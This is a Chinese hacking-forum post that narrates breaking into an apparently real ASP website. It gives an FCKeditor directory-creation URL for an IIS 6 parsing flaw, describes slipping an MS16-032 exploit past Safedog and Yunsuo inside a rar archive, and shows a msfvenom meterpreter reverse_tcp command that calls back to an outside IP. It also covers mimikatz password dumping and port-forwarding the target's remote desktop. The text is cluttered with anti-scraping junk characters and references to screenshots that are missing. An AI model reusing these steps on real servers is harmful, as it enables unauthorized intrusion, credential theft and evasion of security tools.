找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1595|回复: 1

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
发表于 2018-10-20 20:31:43 | 显示全部楼层 |阅读模式

! N; p6 L# y" ]3 R

5 S1 ^2 z/ D+ O3 J/ [! H) u5 O* Z: J* @2 t& X- s5 l2 a- v8 w% P7 N( z) l6 J1 V+ m7 `. X6 ]5 ?' g- R3 {. b# y) _; J! P. J
) N! B9 A/ I4 H' o; n+ k/ Y

1 e6 G: i; S0 W* z- i* Y' r. r" ~9 k
* q3 p1 w" B7 G) m- S5 a
一、 利用getwebshell
K/ X/ y4 Q/ `* B. @
+ P4 H* l( n i7 b+ A7 P
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
. n9 A7 u& L5 _8 T
6 D/ `" N) F h' T" Z+ g 222.png
4 N0 t% V3 H) ~2 x7 y
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 H. s* q# W3 @/ c1 J4 L, p9 k333.png
; Y+ A: E" U# k( B* h( S2 `
下面我们构造一个asp目录,如: " V' K. _/ g w$ s: J7 @

% m$ V' ?7 X/ {1 K. N

. b7 Y& D8 |. h$ J. z' N http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 & }" R0 R) T" d: Q/ F, L! @

8 k$ S; O! w0 @* D \: m! T) } v

0 |7 i+ B0 y; `1 s) k$ L 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
d4 q2 Z/ z. o5 P
+ ?/ P3 L* Z8 Q
一、 绕过安全狗云锁提权并且加账号
7 N' o$ c+ G4 H' b# \ 444.png
# p; L; C9 F+ g) ]
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) f# S0 O, F4 u, p
, V6 F7 @, w4 U( d$ j
如图:
; I4 i& M+ B3 e% u. t" M' I; J555.png
: x2 e$ F# I) ^# e- S9 I% I. F
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
' j: d( B( \4 z) b7 u
}" Y- D( h+ [* o: B
一、 利用metasploit
/ u$ [1 i8 u/ U, B0 l2 M3 X+ Y
) ~6 k& |: p* |7 E
首先用pentestbox生成一个64位的payload如下命令
: _/ a# ^! l" p- I! x1 W/ i
) Q9 Z0 Z; H1 L msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
! p$ y6 `% i/ D3 H. E2 U+ q6 e2 W
, X/ J: H2 G# c0 S! `; @. c. ^% p) K& `4 J
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# n& b* F" T2 I* b/ _4 k, a# H$ p11.png
6 p7 |% a0 r/ ]2 I8 T
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
* V' @" c0 H! m4 Y13.png
$ s! p' _1 ^5 C N+ x
下面我们来做一个监听如下命令:
8 r% ^1 a& ~& o: F9 m/ _% j- ^: Z
: Z& I1 F9 C& k, e. Z0 Qportfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
# V% y2 [. s/ Y+ k3 k 18.png
& {+ E9 C6 G; H1 G# k

" k4 F1 B3 c l8 [
: s) g) c/ ^$ ^

& O- ~; E* | @- Y$ \& o7 G! b

- Q' t4 n# X6 w/ p+ V6 I4 u# D/ z
, k- E3 D5 N7 n' q/ Z$ _! j* a. C
! N0 a8 W3 {6 c7 m# D
$ p7 e* N5 F4 @% z" L$ u6 T

1 a& N$ S1 l0 N2 q5 G
' p; Z; @$ h% k1 T. C 5 s9 Z0 ^7 V6 f

$ Z6 s3 z3 Q+ e6 i2 \$ U
; J$ n6 P# {" b+ q: W

回复

使用道具 举报

匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表